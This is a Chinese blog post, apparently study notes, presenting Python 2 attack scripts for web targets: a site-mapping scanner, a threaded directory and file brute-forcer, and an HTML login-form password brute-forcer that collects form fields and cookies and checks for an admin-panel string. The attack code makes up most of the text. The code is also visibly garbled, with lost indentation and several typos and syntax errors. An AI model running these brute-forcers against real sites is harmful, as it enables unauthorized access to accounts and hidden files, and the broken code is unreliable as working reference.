web攻击

urllib2

Web python 的标准库之一,用于解析url。

示例代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import Queue
import threading
import os
import urllib2


threads = 10

target = ""
directory = ""
filters = [".jpg".".gif".".png".".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r,d,f in os.walk("."):
for files in f:
remote_path = "%s/%s" % (r,files)
if remote_path.startswith("."):
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in filters:
web_paths.put(remote_path)

def test_remote():
while not web_paths.empty():
path = web_paths.get()
url = "%s%s" % (target, path)

request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
print "[%d] => %s" % (response.code, path)
response.close()

except urllib2.HTTPError as error:
print "Failed %s" % error.code
pass

for i in range(threads):
print "Spawning thread: %d" % i
t = threading.Thread(target = test_remote)
t.start()

暴力破解目录和文件位置

我们可以使用简单的代码完成简单的暴力破解工具。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
import urllib2
import threading
import Queue
import urllib

threads = 50
target_url = ""

wordlist_file = ""

resume = None

user_agent = "Mozila/5.0 (x11; linux x86_64; rv:19.0) Gecko/20100101 firefox/19.0"

def build_wordlist(wordlist_file):

with open(wordlist_file, "rb") as f:
raw_words = fd.readlines()

found_resume = False

words = Queue.Queus()

for word in raw_words:
word = word.rstrip()
if resume != None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words

def dir_bruter(word_queue, extensions = None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []

if "." not in attempt:
attempt_list.append("/%s/" % attempt )
else:
attempt_list.append("/%s" % attempt )

if extensions:
for extension in extensions:
attempt_list.append("%s%s" % (attempt, extension) )
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url, headersd = headers)
response = urllib2.urlopen(r)

if len(response.read()):
print "[%d] => %s" % (response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print "!!! %d => %s" % (e.code, url)
pass

word_queue = build_wordlist(wordlist_file)

extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
t = threading.Thread(target = dir_bruter, args = (word_queue, extensions))
t.start()

暴力破解HTML表格认证

要求:

  • 检索登录页面,接受所有返回的cookie值
  • 从HTML中获取所有表单元素
  • 在你的字典中设置所需要猜测的用户名和密码
  • 发送 HTTP POST数据包到登录处理脚本, 数据包含所有的HTML表单文件和存储的cookie值
  • 测试是否能够成功登录Web应用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue

from HTMLParse import HTMLParse

user_threads = 10

username = ""
wordlist_file = ""
resume = None

target_url = ""
target_post = ""

username_field = "username"
password_field = "passwd"

success_check = "Administration - Control Panel"

class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False

print "Finished setting up for: %s" % username

def run_bruteforce(self):
for i in range(user_threads):
t = threading.Thread(target = self.web_bruter)
t.start()

def web_bruter(self):
brute = self.pass.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

response = opener.open(target_url)

page = response.read()

print "Trying: %s:%s (%d left)" % (self.username, brute, self.password_q.qsize())

parser = BruterParser()

parser.feed(page)

post_tags = parser.tag_results

post_tags[username_field] = self.username
post_tags[password_field] = brute

login_data= urllib.urlencode(post_tags)

login_response = opener.open(target_post, login_data)

login_result = login_response.read()

if success_check in login_result:
self.found = True

print "[*] Bruterforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."


class BruterParser(HTMLParse):
def __init__(self):
HTMLParse.__init__(self)
self.tag_results = {}

def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value"
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value


words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()

当使用 HTMLParser 类的时候,有三种主要的方法可以供你使用,分别是:handle_starttag,handle_endtag和handle_data。其中handle_starttag函数可以在遇到一个HTML标签开启时调用,handle_endtag函数正好相反,在每遇到一个HTML标签闭合时使用。handle_data函数用来处理两个标签之间的原始文本。

-----本文结束感谢您的阅读-----
warcup wechat
欢迎扫描二维码关注我的公众号~~~
喜 欢 这 篇 文 章 吗 ?